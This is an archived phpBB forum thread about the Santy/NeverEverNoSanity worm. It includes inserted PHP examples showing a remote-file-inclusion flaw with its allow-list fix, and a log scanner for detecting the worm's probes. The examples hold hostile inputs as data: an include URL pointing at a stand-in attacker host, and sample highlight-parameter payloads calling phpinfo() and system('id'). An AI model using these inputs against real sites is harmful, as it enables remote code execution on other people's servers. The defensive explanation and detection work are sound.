NeverEverNoSanity worm

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
blujay
Registered User
Posts: 11
Joined: Wed Dec 22, 2004 3:24 am

Post by blujay » Sat Dec 25, 2004 9:59 pm

People are claiming on Bugtraq that a new variant of the worm is successfully exploiting phpBB 2.0.11.

http://marc.theaimsgroup.com/?l=bugtraq ... 310128&w=2

CICarScene
Registered User
Posts: 176
Joined: Thu Apr 24, 2003 8:12 am

Post by CICarScene » Sun Dec 26, 2004 10:24 am

blujay wrote: People are claiming on Bugtraq that a new variant of the worm is successfully exploiting phpBB 2.0.11.

http://marc.theaimsgroup.com/?l=bugtraq ... 310128&w=2


Interesting that it now installs a bot, any more information on this?

dupa
Registered User
Posts: 1
Joined: Sun Dec 05, 2004 4:34 pm

Post by dupa » Wed Dec 29, 2004 12:49 pm

CICarScene wrote:
blujay wrote: People are claiming on Bugtraq that a new variant of the worm is successfully exploiting phpBB 2.0.11.

http://marc.theaimsgroup.com/?l=bugtraq ... 310128&w=2


Interesting that it now installs a bot, any more information on this?


Is there any solution to that problem available?

Canislupus
Registered User
Posts: 104
Joined: Tue Nov 23, 2004 12:42 pm

Post by Canislupus » Wed Dec 29, 2004 1:21 pm

The latest 2 variants of Santy have been mislabelled. They do not exploit anything within phpBB but go for the publicised exploits inherent in PHP itself. They are only related to Santy in the message they leave etc. They should be relabelled as a different virus as they use a different attack to gain access.

Update to the latest version of php and remove the issue.

blujay
Registered User
Posts: 11
Joined: Wed Dec 22, 2004 3:24 am

Post by blujay » Wed Dec 29, 2004 4:23 pm

If I understand the latest two "Santy" variants, they do not exploit a native PHP vulnerability, but vulnerabilities in PHP scripts created by script authors; namely, unchecked variables passed in URLs, that are used to access files. The worm replaces that variable with a URL to another file, and the file gets downloaded and used instead.

Being vulnerable to that is the responsibility of the script author, and can be avoided by good coding practices.
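The coding mistake described in the post above, as an added example (this is not code from the thread or from phpBB): a URL parameter passed straight to include(), beside a hardened version that maps the parameter through an allow-list. The parameter name "page" and the pages/ directory are assumptions for illustration.

```php
<?php
// Added example, not code from the thread or from phpBB. It shows the script-author
// bug blujay describes (a URL parameter used directly as an include path) next to a
// hardened version. The "page" parameter and the pages/ directory are assumptions.

// VULNERABLE. With allow_url_fopen on (the PHP default at the time), a request for
//   ?page=http://attacker.example/worm.txt
// makes include() fetch that URL and execute it. Appending ".php" does not help:
// the attacker sends ?page=http://attacker.example/worm.txt? so the ".php" lands in
// the query string of the fetched URL and the remote server ignores it.
function render_page_vulnerable(array $get)
{
    include $get['page'] . '.php';
}

// HARDENED. Map the parameter to a fixed allow-list of local files so the raw value
// never reaches include(). Returns the resolved path, or null when the name is unknown
// or is not a plain string (e.g. ?page[]=x, which would otherwise trip the array lookup).
function resolve_page(array $get)
{
    $pages = array(
        'home'    => __DIR__ . '/pages/home.php',
        'faq'     => __DIR__ . '/pages/faq.php',
        'contact' => __DIR__ . '/pages/contact.php',
    );
    $key = isset($get['page']) ? $get['page'] : 'home';
    if (!is_string($key) || !isset($pages[$key])) {
        return null;
    }
    return $pages[$key];
}

function render_page_safe(array $get)
{
    $path = resolve_page($get);
    if ($path === null) {
        header('HTTP/1.0 404 Not Found');
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Exercise the allow-list without touching the filesystem.
foreach (array('faq', 'http://attacker.example/worm.txt?', '../../etc/passwd') as $value) {
    $verdict = resolve_page(array('page' => $value)) === null ? 'rejected' : 'allowed';
    echo str_pad($value, 40) . ' ' . $verdict . "\n";
}
```

The point of resolve_page() is that the request value is only ever used as an array key; the strings that reach include() are written by the script author, so neither a URL nor a path-traversal string can be injected regardless of the allow_url_fopen setting.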

merlsub
Registered User
Posts: 2
Joined: Sat Jan 03, 2004 2:43 am

Re: NeverEverNoSanity propagation?

Post by merlsub » Tue Jan 04, 2005 10:54 pm

Does anyone know if this worm propagates itself and then launches itself from unassuming hosts? That is, does it install itself on a host and that host is an unwitting perpetrator? Or can I assume that the IP address sending the highlight probe is a willing participant?

The reason I am asking is that I am generating a kill list of IP addresses that have been poking me with this virus. So far, my total list (since Dec 20 when I was hit) is almost 3000 unique IP addresses! I want to block them permanently. While observing this in the last 18 hours, I have gotten more than 30 new unique IP addresses hitting me with this highlight probe.

I've already written a mod that automatically adds the $user_ip to my phpbb_banlist table... so when they hit, I say, thank you for your IP address, here's the door. I am also logging IP addresses to a file so they can be input to a firewall IP address blocker.

Draconian, yes. Necessary?

TIA,
Merlsub
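A log-driven version of the IP harvesting merlsub describes, as an added example (not merlsub's mod and not phpBB code): it scans Apache combined-format access log lines for viewtopic.php requests whose highlight parameter does not look like a plain word search and tallies the source addresses. The probe signature (encoded quote characters or parentheses in the highlight value) and the sample log lines are constructed assumptions; tune the regex against your own logs before feeding the output to a firewall.

```php
<?php
// Added example, not merlsub's mod or phpBB code. Scans Apache combined-format access
// log lines for the viewtopic.php "highlight" probe and tallies source IPs, producing
// a list that can be fed to a firewall or a ban table. The probe heuristic and the
// sample log lines are constructed assumptions; tune the regex to your own logs.

const LOG_LINE_RE = '/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})/';

// A search highlight is a list of words. Quote characters (encoded once or twice)
// or parentheses in it are taken as a probe. Assumption, not a phpBB signature.
function is_highlight_probe($request_path)
{
    if (stripos($request_path, 'viewtopic.php') === false) {
        return false;
    }
    $query = parse_url($request_path, PHP_URL_QUERY);
    if (!is_string($query)) {
        return false;
    }
    parse_str($query, $params);          // decodes one layer: %2527 becomes %27
    if (!isset($params['highlight']) || !is_string($params['highlight'])) {
        return false;
    }
    return preg_match('/%27|\'|\(|\)/', $params['highlight']) === 1;
}

// Returns [ip => hit count] for every line that matches the probe heuristic.
function probe_ips(array $lines)
{
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match(LOG_LINE_RE, $line, $m)) {
            continue;                    // not a combined-format request line
        }
        if (is_highlight_probe($m[2])) {
            $hits[$m[1]] = isset($hits[$m[1]]) ? $hits[$m[1]] + 1 : 1;
        }
    }
    ksort($hits);
    return $hits;
}

// Constructed sample lines (documentation address ranges, no real hosts). Lines 1, 3
// and 5 imitate a probe; line 2 is an ordinary search highlight; line 4 is unrelated.
$sample = [
    '192.0.2.10 - - [20/Dec/2004:11:02:15 +0000] "GET /viewtopic.php?t=12&highlight=%2527.phpinfo().%2527 HTTP/1.0" 200 8411 "-" "-"',
    '198.51.100.7 - - [20/Dec/2004:11:02:40 +0000] "GET /viewtopic.php?t=12&highlight=install+problem HTTP/1.1" 200 8411 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [20/Dec/2004:11:03:01 +0000] "GET /viewtopic.php?t=13&highlight=%2527.phpinfo().%2527 HTTP/1.0" 200 8411 "-" "-"',
    '203.0.113.5 - - [20/Dec/2004:11:05:12 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Dec/2004:11:05:30 +0000] "GET /viewtopic.php?t=9&highlight=%27.system(%27id%27).%27 HTTP/1.0" 200 8411 "-" "-"',
];

foreach (probe_ips($sample) as $ip => $count) {
    printf("%-16s %d\n", $ip, $count);   // one line per source, ready for a deny list
}
```

Two practical notes: parse_str() performs one layer of URL decoding, which is why the check looks for both a literal quote and the still-encoded %27; and, as the next reply in the thread points out, the addresses collected this way belong to already-infected servers, so the list is a snapshot of the worm's current hosts rather than a record of attackers.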

blujay
Registered User
Posts: 11
Joined: Wed Dec 22, 2004 3:24 am

Post by blujay » Wed Jan 05, 2005 12:43 am

You'll be blocking server computers from your server, not end-user computers.

Yes, that's the whole point of a worm: it automatically spreads using the computers it has infected.

Read the URLs posted in this thread to learn how the worm works.
